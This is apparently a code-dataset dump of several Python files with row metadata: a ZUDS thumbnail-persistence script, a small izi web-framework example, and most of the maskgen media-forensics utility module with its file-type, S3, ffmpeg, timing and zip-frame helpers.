threads (list): Thread list that been checked. Method to move a single joint towards the given direction with the given variation. Args: joint_number (int): Number of one of arm's joints. delta_angle (float): Angle to rotate. In degree. direction (bool): Rotate direction. True means CW, otherwise CCW. # self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1]) Method to move endpoint of the arm with the given axis and the distance. 
Args: axis (str): Number of one of arm's joints. distance (int): Moving distance. Method to send current positions. Returns: dict: Response Returns the difference between two angles in the range -pi to +pi | 2.467145 | 2 |
scripts/dothumb.py | charlotteaward/zuds-pipeline | 7 | 6616726 | <reponame>charlotteaward/zuds-pipeline
import sys
import time
import zuds
zuds.init_db()
# db.DBSession().autoflush = False
# db.DBSession().get_bind().echo = True
__author__ = '<NAME> <<EMAIL>>'
__whatami__ = 'Make the subtractions for ZUDS.'
infile = sys.argv[1] # file listing all the subs to do photometry on
BATCH_SIZE = 50
my_work = zuds.get_my_share_of_work(infile)
def batch(iterable, n=1):
l = len(iterable)
for ndx in range(0, l, n):
yield iterable[ndx:min(ndx + n, l)]
for thumbids in batch(my_work, n=BATCH_SIZE):
start = time.time()
thumbs = zuds.DBSession().query(zuds.Thumbnail).filter(zuds.Thumbnail.id.in_(thumbids.tolist()))
for t in thumbs:
t.persist()
stop = time.time()
zuds.print_time(start, stop, t, 'get and persist')
start = time.time()
zuds.DBSession().commit()
stop = time.time()
zuds.print_time(start, stop, t, 'commit')
| import sys
import time
import zuds
zuds.init_db()
# db.DBSession().autoflush = False
# db.DBSession().get_bind().echo = True
__author__ = '<NAME> <<EMAIL>>'
__whatami__ = 'Make the subtractions for ZUDS.'
infile = sys.argv[1] # file listing all the subs to do photometry on
BATCH_SIZE = 50
my_work = zuds.get_my_share_of_work(infile)
def batch(iterable, n=1):
l = len(iterable)
for ndx in range(0, l, n):
yield iterable[ndx:min(ndx + n, l)]
for thumbids in batch(my_work, n=BATCH_SIZE):
start = time.time()
thumbs = zuds.DBSession().query(zuds.Thumbnail).filter(zuds.Thumbnail.id.in_(thumbids.tolist()))
for t in thumbs:
t.persist()
stop = time.time()
zuds.print_time(start, stop, t, 'get and persist')
start = time.time()
zuds.DBSession().commit()
stop = time.time()
zuds.print_time(start, stop, t, 'commit') | en | 0.549932 | # db.DBSession().autoflush = False # db.DBSession().get_bind().echo = True # file listing all the subs to do photometry on | 2.38568 | 2 |
examples/override_404.py | izi-global/izir | 0 | 6616727 | <reponame>izi-global/izir<filename>examples/override_404.py
import izi
@izi.get()
def hello_world():
return 'Hello world!'
@izi.not_found()
def not_found():
return {'Nothing': 'to see'}
| import izi
@izi.get()
def hello_world():
return 'Hello world!'
@izi.not_found()
def not_found():
return {'Nothing': 'to see'} | none | 1 | 1.954177 | 2 | |
maskgen/tool_set.py | j-h-m/Media-Journaling-Tool | 0 | 6616728 | <reponame>j-h-m/Media-Journaling-Tool
# =============================================================================
# Authors: PAR Government
# Organization: DARPA
#
# Copyright (c) 2016 PAR Government
# All rights reserved.
# ==============================================================================
import imghdr
import math
import platform
import re
import sys
import threading
import warnings
from datetime import datetime
from subprocess import Popen, PIPE
from scipy import ndimage
from skimage.measure import compare_ssim
import cv2api
import loghandling
import maskgen.exif
from ffmpeg_api import get_ffprobe_tool, ffmpeg_overlay
from image_wrap import *
from maskgen.support import removeValue, getValue
from maskgen.userinfo import get_username
from maskgen_loader import MaskGenLoader
imagefiletypes = [("jpeg files", "*.jpg"), ("png files", "*.png"), ("tiff files", "*.tiff"), ("tiff files", "*.tif"),
("Raw NEF", "*.nef"), ("ARW Sony", "*.arw"), ("CRW Canon", "*.crw"), ("raw panasonic", "*.raw"),
("Raw 2 Panasonic", "*.rw2"), ("ORF Olympus", "*.orf"), ("MDC Minolta", "*.mdc"),
("PTX Pentax", "*.ptx"),
("PEF Pentax", "*.pef"), ("MRW Minolta", "*.nrw"), ("Adobe", "*.dng"),
("bmp files", "*.bmp"), ("pdf files", "*.pdf"), ('cr2', '*.cr2'), ('raf Fuji', '*.raf'),
("NITF files","*.ntf"),("NITF files","*.nitf"),('JP2','*.jp2'), ('Lytro Raw','*.lfr'),
("High Efficiency Image File Format", "*.heic"), ("High Efficiency Image File Format", "*.heif")]
videofiletypes = [("mpeg files", "*.mp4"), ("mov files", "*.mov"), ('wmv', '*.wmv'), ('m4p', '*.m4p'), ('m4v', '*.m4v'),
('f4v', '*.flv'), ("avi files", "*.avi"), ('asf', '*.asf'), ('mts', '*.mts'), ('3gp', '*.3gp'),
('mxf', '*.mxf')]
audiofiletypes = [("mpeg audio files", "*.m4a"), ("mpeg audio files", "*.m4p"), ("mpeg audio files", "*.mp3"),
("raw audio files", "*.raw"), ("Audio Interchange File", "*.aif"),
("Audio Interchange File", "*.aiff"),
("Standard PC audio files", "*.wav"), ("Windows Media audio files", "*.wma")]
zipfiletypes = [('zip of images','*.zip'),('zip of images','*.gz'),('zip of images','*.tgz')]
textfiletypes = [("CSV file", "*.csv"), ("json file", "*.json"), ("text file", "*.txt"), ("log file","*.log")]
suffixes = [".nef", ".jpg", ".png", ".tiff", ".bmp", ".avi", ".mp4", ".mov", ".wmv", ".ppm", ".pbm", ".mdc",".gif",
".raf", ".ptx", ".pef", ".mrw",".dng", ".zip",".gz", ".cr2",".jp2",
".wav", ".wma", ".m4p", ".mp3", ".m4a", ".raw", ".asf", ".mts",".tif",".arw",".orf",".raw",".rw2",".crw"]
maskfiletypes = [("png files", "*.png"), ("zipped masks", "*.tgz")]
modelfiletypes = [('3D Studio', '*.3ds'), ('Blender', '*.blen'), ('Collada', '*.dae'), ('AutoCAD', '*.dxf'),
('Autodesk Exchange', '*.fbx'), ('geoTIFF', '*.tif'), ('gITF', '*.gITF'), ('Lightwave', '*.lwo'),
('OBJ Files', '*.obj'), ('OFF File', '*.off'), ('PLY Files', '*.ply'), ('PTS Files', '*.pts'),
('PTX Files', '*.ptx'), ('Sculptris', '*.sc1'), ('Pro/ENGINEER', '*.scl'),
('Google Sketchup', '*.skp'), ('STL File', '*.stl'), ('TRI Files', '*.tri'), ('V3D Files', '*.v3d'),
('VRML (WRL Files)', '*.wrl'), ('X3D Files', '*.x3d'), ('X3DV Files', '*.x3dv'),
('SoftImage', '*.xsi'), ('ZBrush', '*.ztl'), ('XYZ Files', '*.xyz')]
class S3ProgessComposite(object):
    """Fan a single byte-count progress callback out to several progress monitors."""
    def __init__(self, progress_monitors=None):
        # Avoid the shared mutable default-argument pitfall.
        self.progress_monitors = progress_monitors if progress_monitors is not None else []
def __call__(self, bytes_amount):
for pm in self.progress_monitors:
pm(bytes_amount)
class S3ProgressPercentage(object):
def __init__(self, filename, log = None):
self._filename = filename
self._size = float(os.path.getsize(filename))
self._seen_so_far = 0
self._percentage_so_far = 0
self._lock = threading.Lock()
self.log = log if log is not None else logging.getLogger('maskgen').info
def __call__(self, bytes_amount):
# To simplify we'll assume this is hooked up
# to a single filename.
with self._lock:
self._seen_so_far += bytes_amount
percentage = (self._seen_so_far / self._size) * 100
if (percentage - self._percentage_so_far) > 5:
self.log(
"%s %s / %s (%.2f%%)" % (
self._filename, self._seen_so_far, self._size,
percentage))
self._percentage_so_far = percentage
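# Example (hedged sketch): S3ProgressPercentage matches the callback shape that
# boto3's upload_file expects (a callable invoked with the number of bytes
# transferred), so it can be passed as the Callback argument. The bucket, key,
# and local path below are hypothetical.
#
#   import boto3
#   s3 = boto3.client('s3')
#   progress = S3ProgressPercentage('/tmp/project.tgz')
#   s3.upload_file('/tmp/project.tgz', 'my-bucket', 'uploads/project.tgz',
#                  Callback=progress)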
def exportlogsto3(location, last_uploaded):
    """
    Upload the most recent rolled-over maskgen log (when it differs from last_uploaded)
    to a 'logs/' folder alongside the given S3 location ('bucket/path/').
    Return the name of the log file considered, or None if there is none.
    """
import boto3
loghandling.flush_logging()
logging_file = get_logging_file()
if logging_file is not None and last_uploaded != logging_file:
logging_file_name = os.path.split(logging_file)[1]
s3 = boto3.client('s3', 'us-east-1')
bucket = location.split('/')[0].strip()
directory = location[location.find('/') + 1:].strip()
directory = directory[:-1] if directory.endswith('/') else directory
directory = directory[:directory.rfind('/') + 1:].strip() + "logs/"
try:
s3.upload_file(logging_file, bucket, directory + get_username() + '_' + logging_file_name)
except:
logging.getLogger('maskgen').error("Could not upload prior log file to " + directory)
return logging_file
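# Example (hedged sketch): exportlogsto3 takes an S3 location of the form
# "bucket/path/to/projects/" and pushes the rolled-over log into a sibling
# "logs/" folder. The bucket and prefix below are hypothetical.
#
#   last = None
#   last = exportlogsto3('my-bucket/journaling/projects/', last)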
def fetchbyS3URL(url):
    """Download an S3 object given an 's3://bucket/key' URL or a bare 'bucket/key' location; return the local path."""
import boto3
location = url[5:] if url.startswith('s3://') else url
parts = location.split('/')
BUCKET = parts[0].strip()
location = location[location.find('/') + 1:].strip()
file = parts[-1]
s3 = boto3.resource('s3')
destination = os.path.join('.', file)
my_bucket = s3.Bucket(BUCKET)
my_bucket.download_file(location, destination)
return destination
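# Example (hedged sketch): fetchbyS3URL accepts either an s3:// URL or a bare
# "bucket/key" location and downloads the object into the current directory.
# The URL below is hypothetical.
#
#   local_copy = fetchbyS3URL('s3://my-bucket/journaling/sample.json')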
def get_icon(name):
    """Search the sys.path entries that carry an 'icons' directory for the named icon; return its path or None."""
places = [] # ['./icons']
places.extend([os.path.join(x, 'icons/' + name) for x in sys.path if ('maskgen' in x or not x.endswith('egg')) and \
os.path.exists(os.path.join(x, 'icons'))])
for place in places:
if os.path.exists(place):
return place
return None
def get_logging_file():
"""
    :return: The most recently rolled-over log file name, or None if no rolled-over log exists
"""
newest = None
newest_time = None
filename = 'maskgen.log.'
for item in os.listdir('.'):
if item.startswith(filename):
t = os.stat(item).st_ctime
if newest_time is None or newest_time < t:
newest = item
newest_time = t
return newest
def getImageFileTypes():
prefLoader = MaskGenLoader()
filetypes = prefLoader.get_key('filetypes')
filetypes = [] if filetypes is None else filetypes
types = [tuple(x) for x in filetypes]
tset = set([x[1] for x in types])
for suffix in getFileTypes():
if suffix[1] not in tset:
types.append(suffix)
return types
def getMaskFileTypes():
return maskfiletypes
def getFileTypes():
return imagefiletypes + videofiletypes + audiofiletypes + zipfiletypes
def fileTypeChanged(file_one, file_two):
"""
Return: True if the file types of the two provided files do not match
"""
try:
one_type = fileType(file_one)
two_type = fileType(file_two)
return one_type != two_type
except:
return os.path.splitext(file_one)[1].lower() != os.path.splitext(file_two)[1].lower()
def runCommand(command,outputCollector=None):
p = Popen(command, stdout=PIPE, stderr=PIPE)
stdout, stderr = p.communicate()
errors = []
if p.returncode == 0:
if outputCollector is not None:
for line in stdout.splitlines():
outputCollector.append(line)
if p.returncode != 0:
try:
if stderr is not None:
for line in stderr.splitlines():
if len(line) > 2:
errors.append(line)
except OSError as e:
errors.append(str(e))
return errors
def isVideo(filename):
ffmpegcommand = [get_ffprobe_tool(), filename]
try:
p = Popen(ffmpegcommand, stdout=PIPE, stderr=PIPE)
stdout, stderr = p.communicate()
return stderr.find('Invalid data') < 0
except:
return False
def getMimeType(filename):
import subprocess
import shlex
cmd = shlex.split('file --mime-type "{0}"'.format(filename))
try:
result = subprocess.check_output(cmd)
return (result.split(':')[1]).split('/')[0].strip()
except Exception as e:
logging.getLogger('maskgen').error('Cannot determine file type for "{}": {}'.format(
filename,
str(e)
))
raise ValueError('Cannot determine file type for "{}"'.format(
filename
))
def zipFileType(fileName):
parts = fileName.lower().split('.')
if parts[-1] not in ['zip','gz','tgz']:
return None
return fileType('.'.join(parts[0:-1]))
def fileType(fileName):
if os.path.isdir(fileName):
return 'dir'
lowerName = fileName.lower()
suffixes = lowerName.split('.')
suffix = '*.' + suffixes[-1] if len(suffixes) > 0 else ''
file_type = None
if suffix in ['*.zip', '*.tgz', '*.gz']:
file_type = 'zip'
if len(suffixes) > 2:
content_type = '*.' + suffixes[-2]
if content_type not in [x[1] for x in imagefiletypes]:
file_type = 'collection'
elif suffix in [x[1] for x in imagefiletypes] or (os.path.exists(fileName) and imghdr.what(fileName) is not None):
file_type = 'image'
elif suffix in [x[1] for x in audiofiletypes]:
file_type = 'audio'
elif suffix in [x[1] for x in textfiletypes]:
file_type = 'text'
elif suffix in [x[1] for x in videofiletypes] or isVideo(fileName):
file_type = 'video'
return getMimeType(fileName) if file_type is None else file_type
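# Illustrative examples (not part of the original module), assuming the usual entries in the
# imagefiletypes/videofiletypes lists defined above:
#   fileType('photo.jpg')  -> 'image'
#   fileType('clip.mov')   -> 'video'
#   fileType('frames.zip') -> 'zip' (or 'collection' when the inner extension is not an image type)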
def getOS():
return platform.system() + ' ' + platform.release() + ' ' + platform.version()
def openFile(fileName):
"""
Open a file using a native OS associated program
"""
import sys
if fileName.endswith('.hdf5'):
fileName = convertToVideo(fileName, preferences=MaskGenLoader())
if sys.platform.startswith('linux'):
os.system('xdg-open "' + fileName + '"')
elif sys.platform.startswith('win'):
os.startfile(fileName)
else:
os.system('open "' + fileName + '"')
class IntObject:
value = 0
def __init__(self):
pass
def set(self, value):
self.value = value
def increment(self):
self.value += 1
return self.value
def imageResize(img, dim):
"""
:param img:
:param dim:
:return:
@rtype: ImageWrapper
"""
return img.resize(dim, Image.ANTIALIAS).convert('RGBA')
def imageResizeRelative(img, dim, otherImDim):
"""
    Preserves the dimension ratios.
    :param dim: maximum dimensions (width, height)
    :param otherImDim: dimensions of the other image
    :return: image resized to fit within dim, preserving the aspect ratio relative to the larger image
@rtype: ImageWrapper
"""
if otherImDim is None and img is not None:
otherImDim = img.size
if img is None:
img = ImageWrapper(np.zeros((otherImDim[1], otherImDim[0]), dtype=np.uint8))
wmax = max(img.size[0], otherImDim[0])
hmax = max(img.size[1], otherImDim[1])
wpercent = float(dim[0]) / float(wmax)
hpercent = float(dim[1]) / float(hmax)
perc = min(wpercent, hpercent)
wsize = int((float(img.size[0]) * float(perc)))
hsize = int((float(img.size[1]) * float(perc)))
return img.resize((wsize, hsize), Image.ANTIALIAS)
def validateCoordinates(v):
"""
Coordinates are [x,y] or (x,y) or x,y where x and y are integers.
Return False if the coordinates are invalid.
"""
try:
        return len([int(re.sub(r'[()\[\]]', '', x)) for x in v.split(',')]) == 2
except ValueError:
return False
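# Illustrative examples (not part of the original module):
#   validateCoordinates('(300,400)') -> True
#   validateCoordinates('300,400')   -> True
#   validateCoordinates('300')       -> False (only one value)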
def sumMask(mask):
return int(np.sum(mask))
class VidTimeManager:
"""
frameCountWhenStarted: record the frame at start
frameCountWhenStopped: record the frame at finish
"""
def __init__(self, startTimeandFrame=None, stopTimeandFrame=None):
self.startTimeandFrame = startTimeandFrame
self.stopTimeandFrame = stopTimeandFrame
#if startTimeandFrame is not None and startTimeandFrame[1] > 0 and startTimeandFrame[0] > 0:
# self.startTimeandFrame = (startTimeandFrame[0],startTimeandFrame[1]+1)
#if stopTimeandFrame is not None and stopTimeandFrame[1] > 0 and stopTimeandFrame[0] > 0:
# self.stopTimeandFrame = (stopTimeandFrame[0],stopTimeandFrame[1]+1)
self.pastEndTime = False
self.beforeStartTime = True if startTimeandFrame else False
self.reachedEnd = False
self.milliNow = 0
self.frameCountWhenStopped = 0
self.frameCountWhenStarted = 0
self.frameSinceBeginning = 0
self.frameCountSinceStart = 0
self.frameCountSinceStop = 0
def isAtBeginning(self):
return self.startTimeandFrame is None or (self.startTimeandFrame[0] < 0 and self.startTimeandFrame[1] < 2)
def spansToEnd(self):
return self.stopTimeandFrame is None or (self.stopTimeandFrame[0] is None and self.stopTimeandFrame[1] is None)
def getExpectedStartFrameGiveRate(self, rate, defaultValue=None):
if not self.startTimeandFrame:
return defaultValue
return self.startTimeandFrame[1] + (self.startTimeandFrame[0] / 1000.0) * float(rate)
def getExpectedEndFrameGiveRate(self, rate, defaultValue=None):
if not self.stopTimeandFrame:
return defaultValue
val = int(self.stopTimeandFrame[1] + (self.stopTimeandFrame[0] / 1000.0) * float(rate))
if val == 0:
return defaultValue
return self.stopTimeandFrame[1] + (self.stopTimeandFrame[0] / 1000.0) * float(rate)
def getStartFrame(self):
return self.frameCountWhenStarted if self.startTimeandFrame else 1
def getEndFrame(self):
return self.frameCountWhenStopped if self.stopTimeandFrame and self.frameCountWhenStopped else self.frameSinceBeginning
def updateToNow(self, milliNow, frames=1):
"""
:param milliNow: time after the frame is to be displayed or sound emitted
:param frames:
:return:
"""
self.milliNow = milliNow
self.frameSinceBeginning += frames
if self.stopTimeandFrame:
if self.milliNow > self.stopTimeandFrame[0]:
self.frameCountSinceStop += frames
if self.frameCountSinceStop >= self.stopTimeandFrame[1]:
self.frameCountWhenStopped = self.frameSinceBeginning
self.reachedEnd = True
if not self.pastEndTime and self.frameCountSinceStop > self.stopTimeandFrame[1]:
self.pastEndTime = True
self.frameCountWhenStopped = self.frameSinceBeginning - 1
if self.startTimeandFrame:
if self.milliNow > self.startTimeandFrame[0]:
self.frameCountSinceStart += frames
if self.frameCountSinceStart >= self.startTimeandFrame[1]:
if self.beforeStartTime:
self.frameCountWhenStarted = self.frameSinceBeginning
self.beforeStartTime = False
def setStopFrame(self, frame):
if self.stopTimeandFrame is not None and self.stopTimeandFrame[0] > 0:
self.frameCountSinceStop = self.frameSinceBeginning
self.stopTimeandFrame = (0,frame)
def isOpenEnded(self):
return self.stopTimeandFrame is None
def isEnd(self):
return self.reachedEnd
def isPastTime(self):
return self.pastEndTime
def isPastStartTime(self):
return self.startTimeandFrame and self.milliNow > self.startTimeandFrame[0] and \
self.frameCountSinceStart > self.startTimeandFrame[1]
def isBeforeTime(self):
return self.beforeStartTime
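# Illustrative usage (not part of the original module): start/stop times are (milliseconds, frame count)
# tuples. Feed updateToNow() the elapsed time after each frame is read, then consult isBeforeTime(),
# isPastTime(), getStartFrame() and getEndFrame() to locate the selected frame range, e.g.
#   tm = VidTimeManager(startTimeandFrame=(0, 10), stopTimeandFrame=(0, 20))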
def getFrameDurationString(st, et):
"""
    Calculate the duration between two time strings (HH:MM:SS[.ffffff]) as HH:MM:SS
"""
try:
stdt = datetime.strptime(st, '%H:%M:%S.%f')
except ValueError:
stdt = datetime.strptime(st, '%H:%M:%S')
try:
etdt = datetime.strptime(et, '%H:%M:%S.%f')
except ValueError:
etdt = datetime.strptime(et, '%H:%M:%S')
delta = etdt - stdt
if delta.days < 0:
return None
sec = delta.seconds
sec += (1 if delta.microseconds > 0 else 0)
hr = sec / 3600
mi = sec / 60 - (hr * 60)
ss = sec - (hr * 3600) - mi * 60
return '{:=02d}:{:=02d}:{:=02d}'.format(hr, mi, ss)
def getSecondDurationStringFromMilliseconds(millis):
sec = int(millis / 1000)
ms = int(millis - (sec * 1000))
return '{:=02d}.{:=03d}'.format(sec, ms)
def getDurationStringFromMilliseconds(millis):
sec = int(millis / 1000)
ms = int((millis - (sec * 1000)) * 1000.0)
hr = sec / 3600
mi = sec / 60 - (hr * 60)
ss = sec - (hr * 3600) - mi * 60
return '{:=02d}:{:=02d}:{:=02d}.{:=06d}'.format(hr, mi, ss, ms)
def addTwo(num_string):
return int(num_string) + 2
def sutractOne(num_string):
return int(num_string) - 1
def addOneFrame(time_string):
time_val = getMilliSecondsAndFrameCount(time_string, defaultValue=(0,0))
return str(time_val[1] + 1)
def subtractOneFrame(time_string):
time_val = getMilliSecondsAndFrameCount(time_string, defaultValue=(0,1))
return str(time_val[1] - 1) if time_val[1] > 1 else '0'
def addFrame(millisAndFrame, frames):
return millisAndFrame[0], millisAndFrame[1] + frames
def differenceBetweenFrame(mandf1, mandf2, rate):
timediff = mandf1[0] - mandf2[0]
frames = int(timediff*rate/1000.0)
return frames + (mandf1[1] - mandf2[1])
def differenceBetweeMillisecondsAndFrame(mandf1, mandf2, rate):
return mandf1[0] - mandf2[0] + (rate * (mandf1[1] - mandf2[1]))
def differenceInFramesBetweenMillisecondsAndFrame(mandf1, mandf2, rate):
return (mandf1[0] - mandf2[0]) / 1000.0 / rate + mandf1[1] - mandf2[1]
def getMilliSeconds(v):
if v is None:
        return None
if type(v) in [int,float]:
return v
dt = None
coloncount = v.count(':')
if coloncount == 0:
return int(float(v) * 1000.0)
try:
if '.' in v and len(v) > 15:
v = v[:15]
dt = datetime.strptime(v, '%H:%M:%S.%f')
except ValueError:
try:
dt = datetime.strptime(v, '%H:%M:%S')
except ValueError:
return None
    millis = dt.hour * 3600000 + dt.minute * 60000 + dt.second * 1000 + dt.microsecond / 1000
return millis
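# Illustrative examples (not part of the original module):
#   getMilliSeconds('2.5')          -> 2500
#   getMilliSeconds('00:01:02.500') -> 62500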
def getMilliSecondsAndFrameCount(v, rate=None, defaultValue=None):
if v is None:
return defaultValue
if type(v) == int:
return (float(v) / rate * 1000, 0) if rate is not None else (0, 1 if v == 0 else v)
frame_count = 0
coloncount = v.count(':')
if coloncount > 2:
try:
frame_count = int(v[v.rfind(':') + 1:])
v = v[0:v.rfind(':')]
except:
return defaultValue
elif coloncount == 0:
return (float(v) / rate * 1000.0, 0) if rate is not None else (0, 1 if v == 0 else int(v))
try:
if '.' in v and len(v) > 15:
v = v[:15]
dt = datetime.strptime(v, '%H:%M:%S.%f')
except ValueError:
try:
dt = datetime.strptime(v, '%H:%M:%S')
except ValueError:
return defaultValue
    millis = dt.hour * 3600000 + dt.minute * 60000 + dt.second * 1000 + dt.microsecond / 1000
if rate is not None:
millis += float(frame_count) / rate * 1000.0
frame_count = 0
return (millis, frame_count) if (millis, frame_count) != (0, 0) else (0, 1)
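# Illustrative examples (not part of the original module):
#   getMilliSecondsAndFrameCount('10')           -> (0, 10)    (a bare number is a frame count when no rate is given)
#   getMilliSecondsAndFrameCount('00:00:01.500') -> (1500, 0)
#   getMilliSecondsAndFrameCount('00:00:01:5')   -> (1000, 5)  (a trailing ':5' is a frame offset)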
def validateTimeString(v):
if type(v) == int:
return True
if v.count(':') > 2:
return False
if v.count(':') == 0:
try:
int(v)
except:
return False
return True
try:
datetime.strptime(v, '%H:%M:%S.%f')
except ValueError:
try:
datetime.strptime(v, '%H:%M:%S')
except ValueError:
return False
return True
def validateAndConvertTypedValue(argName, argValue, operationDef, skipFileValidation=True):
"""
Validate a typed operation argument
return the type converted argument if necessary
raise a ValueError if invalid
"""
if not argValue or len(str(argValue)) == 0:
raise ValueError(argName + ' cannot be an empty string')
argDef = operationDef.optionalparameters[argName] if argName in operationDef.optionalparameters else None
argDef = operationDef.mandatoryparameters[
argName] if not argDef and argName in operationDef.mandatoryparameters else argDef
if argDef:
if argDef['type'] == 'imagefile':
if not os.path.exists(argValue) and not skipFileValidation:
raise ValueError(argName + ' is an invalid file')
elif argDef['type'].startswith('float'):
typeDef = argDef['type']
vals = [float(x) for x in typeDef[typeDef.rfind('[') + 1:-1].split(':')]
if float(argValue) < vals[0] or float(argValue) > vals[1]:
raise ValueError(argName + ' is not within the defined range')
return float(argValue)
elif argDef['type'].startswith('int'):
typeDef = argDef['type']
_match = re.search(r"\[(.*?)\]", typeDef).group(1)
vals = [int(x) for x in _match.split(':')]
if int(argValue) < vals[0] or int(argValue) > vals[1]:
raise ValueError(argName + ' is not within the defined range')
return int(argValue)
elif argDef['type'] == 'list':
if argValue not in argDef['values']:
raise ValueError(argValue + ' is not one of the allowed values')
elif argDef['type'] in ('frame_or_time', 'time'):
if not validateTimeString(argValue):
raise ValueError(argValue + ' is not a valid time (e.g. HH:MM:SS.micro)')
elif argDef['type'] == 'yesno':
if argValue.lower() not in ['yes', 'no']:
raise ValueError(argName + ' is not yes or no')
elif argDef['type'] == 'coorindates':
if not validateCoordinates(argValue):
raise ValueError(argName + ' is not a valid coordinate (e.g. (6,4)')
return argValue
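# Illustrative example (not part of the original module), assuming an operation definition whose
# mandatory parameter 'angle' has type 'int[0:360]':
#   validateAndConvertTypedValue('angle', '90', operationDef)  -> 90
#   validateAndConvertTypedValue('angle', '400', operationDef) -> raises ValueError (out of range)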
def _processFileMeta(stream):
streams = []
if stream is None:
return streams
for line in stream.splitlines():
if line is None or len(line) == 0:
break
if 'Stream' in line:
if 'Audio' in line:
streams.append('audio')
if 'Video' in line:
streams.append('video')
return streams
def getFileMeta(filename):
ffmpegcommand = os.getenv('MASKGEN_FFPROBETOOL', 'ffprobe')
try:
stdout, stderr = Popen([ffmpegcommand, filename], stdout=PIPE, stderr=PIPE).communicate()
if stderr is not None:
meta = _processFileMeta(stderr)
if stdout is not None:
meta.extend(_processFileMeta(stdout))
return meta
except Exception as e:
logging.getLogger('maskgen').error('FFMPEG error (is it installed?): ' + str(e))
        return []
def millisec2time(milliseconds):
''' Convert milliseconds to 'HH:MM:SS.FFF' '''
s, ms = divmod(milliseconds, 1000)
m, s = divmod(s, 60)
h, m = divmod(m, 60)
d, h = divmod(h, 24)
if ms > 0:
pattern = r'%02d:%02d:%02d.%03d'
return pattern % (h, m, s, ms)
else:
pattern = r'%02d:%02d:%02d'
return pattern % (h, m, s)
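# Illustrative examples (not part of the original module):
#   millisec2time(61000)   -> '00:01:01'
#   millisec2time(3723004) -> '01:02:03.004'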
def outputVideoFrame(filename, outputName=None, videoFrameTime=None, isMask=False):
import os
ffcommand = os.getenv('MASKGEN_FFMPEG', 'ffmpeg')
if outputName is not None:
outfilename = outputName
else:
outfilename = os.path.splitext(filename)[0] + '.png'
command = [ffcommand, '-i', filename]
if videoFrameTime is not None:
st = videoFrameTime[0] + 30 * videoFrameTime[1]
command.extend(['-ss', millisec2time(st)])
command.extend(['-vframes', '1', outfilename])
try:
p = Popen(command, stdout=PIPE, stderr=PIPE)
p.communicate()
p.wait()
except OSError as e:
logging.getLogger('maskgen').error("FFmpeg not installed")
logging.getLogger('maskgen').error(str(e))
raise e
return openImage(outfilename, isMask=isMask)
class ZipWriter:
def __init__(self, filename, fps=30):
from zipfile import ZipFile
postfix = filename[filename.rfind('.'):]
self.filename = filename + ('.zip' if postfix not in ['.tgz','.zip'] else '')
self.myzip = ZipFile(self.filename, 'w')
self.count = 0
self.fps = fps
self.prefix = os.path.basename(os.path.splitext(self.filename)[0])
#self.names = []
def isOpened(self):
#TODO: check names, what else
return True
def get(self,prop):
if prop == cv2api.cv2api_delegate.prop_fps:
return self.fps
if prop == cv2api.cv2api_delegate.prop_frame_count:
return self.count
if prop == cv2api.cv2api_delegate.prop_pos_msec:
return self.count * self.fps
def write(self, frame):
fname = "{}_{}.png".format(self.prefix, self.count)
ImageWrapper(frame,filename=fname).save(fname)
self.myzip.write(fname,fname)
self.count+=1
os.remove(fname)
def release(self):
fn = 'meta.csv'
with open(fn,'w') as fp:
            fp.write('frame_rate,{}\n'.format(self.fps))
self.myzip.write(fn, fn)
os.remove('meta.csv')
self.myzip.close()
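# Illustrative usage (not part of the original module): ZipWriter mimics a cv2.VideoWriter over a zip
# of numbered PNG frames plus a meta.csv holding the frame rate.
#   writer = ZipWriter('frames.zip', fps=30)
#   writer.write(frame_array)   # one call per frame (numpy array accepted by ImageWrapper)
#   writer.release()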
class ZipCapture:
def __init__(self, filename, fps=30, filetypes=imagefiletypes):
from zipfile import ZipFile
import uuid
self.filename = filename
self.myzip = ZipFile(filename, 'r')
file_type_matcher = re.compile('.*\.(' + '|'.join([ft[1][ft[1].rfind('.') + 1:] for ft in filetypes]) + ')')
self.fps = fps
self.count = 0
self.dir = os.path.join(os.path.dirname(os.path.abspath(self.filename)) , uuid.uuid4().__str__())
os.mkdir(self.dir)
if 'meta.csv' in self.myzip.namelist():
self.loadMeta()
self.names = [name for name in self.myzip.namelist() if len(file_type_matcher.findall(name.lower())) > 0 and \
os.path.basename(name) == name]
self.exif = None
def loadMeta(self):
self.meta = {}
if 'meta.csv' in self.myzip.namelist():
fn = self._extract_name('meta.csv')
with open(fn,mode='r') as fp:
for line in fp.readlines():
parts = line.split(',')
self.meta[parts[0].lower().strip()] = ','.join(parts[1:])
self.fps = self.fps if 'frame_rate' not in self.meta else float(self.meta['frame_rate'])
def get_size(self):
return len(self.names)
def isOpened(self):
#TODO: check names, what else
return True
def _extract_name(self,name):
extracted_file = os.path.join(self.dir, name)
if not os.path.exists(extracted_file):
extracted_file = self.myzip.extract(name, self.dir)
return extracted_file
def get(self,prop):
if prop == cv2api.cv2api_delegate.prop_fps:
return self.fps
if prop == cv2api.cv2api_delegate.prop_frame_count:
return self.get_size()
if prop == cv2api.cv2api_delegate.prop_pos_msec:
return self.count* 1000.0/self.fps
exif = self.get_exif()
if prop == cv2api.cv2api_delegate.prop_frame_height:
return getExifDimensionsFromData(exif)[0][0]
if prop == cv2api.cv2api_delegate.prop_frame_width:
return getExifDimensionsFromData(exif)[0][1]
def grab(self):
self.count+=1
return self.count <= len(self.names)
def get_exif(self):
if self.exif is None:
name = self.names[min(len(self.names)-1,max(0, self.count - 1))]
extracted_file = self._extract_name (name)
self.exif = exif.getexif(extracted_file)
return self.exif
def retrieve(self):
if self.count > len(self.names):
return False, None
name = self.names[self.count-1]
extracted_file = self._extract_name (name)
return True, openImage(extracted_file, isMask=False).to_array()
def set_to_end(self):
self.count = len(self.names)
def retrieve_file(self):
if self.count > len(self.names):
return None
name = self.names[self.count-1]
extracted_file = self._extract_name (name)
return extracted_file
def read(self):
self.grab()
return self.retrieve()
def release(self):
import shutil
if self.dir is not None:
shutil.rmtree(self.dir)
self.myzip.close()
self.dir = None
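# Illustrative usage (not part of the original module): ZipCapture mimics the cv2.VideoCapture read
# loop over a zip of image frames.
#   cap = ZipCapture('frames.zip', fps=30)
#   ret, frame = cap.read()
#   while ret:
#       ...  # process frame
#       ret, frame = cap.read()
#   cap.release()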
def readFromZip(filename, filetypes=imagefiletypes, videoFrameTime=None, isMask=False, snapshotFileName=None, fps=30):
from zipfile import ZipFile
import re
file_type_matcher = re.compile('.*\.(' + '|'.join([ft[1][ft[1].rfind('.') + 1:] for ft in filetypes]) + ')')
with ZipFile(filename, 'r') as myzip:
names = myzip.namelist()
names.sort()
time_manager = VidTimeManager(stopTimeandFrame=videoFrameTime)
i = 0
